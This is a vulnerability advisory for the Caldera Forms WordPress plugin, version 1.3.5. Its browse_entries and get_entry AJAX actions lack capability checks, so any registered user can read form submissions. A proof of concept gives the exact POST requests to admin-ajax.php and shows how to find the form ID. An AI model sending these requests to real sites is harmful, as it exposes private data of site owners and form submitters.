Caldera Forms [Sensitive Data Exposure]
Description
Plugin Caldera Forms - Drag and drop responsive form builder registers
AJAX action browse_entries in order to provide a convenient way for
admin to see all records from a specific form. This action calls the
browse_entries() function, which lacks capabilities checks, in order
to provide the information requested, thus allowing a registered user to
exploit it in order to get sensitive information.
The same result can be achieved by exploiting the action get_entry
with the main difference that this time the attacker must provide entry
ids.
In order to exploit this an attacker will need a registered user account and the ID of the form. The later can be acquired from various elements of the form HTML mark up like the one displayed bellow:
<input name="_cf_frm_id" value="CF5719ec6205cb3" type="hidden">
PoC
First a form must be created and some entries added in it. Next the attacker can use a request like:
POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [COOKIES]
action=browse_entries
&form=CF5719ec6205cb3
or using the get_entry action:
POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [COOKIES]
action=get_entry
&form=CF5719ec6205cb3
&entry=1
- 22 April 2016
- Pan Vag
- calderawp.com
- Caldera Forms
- 1.3.5
- WordPress 4.5
- DWF-2016-87023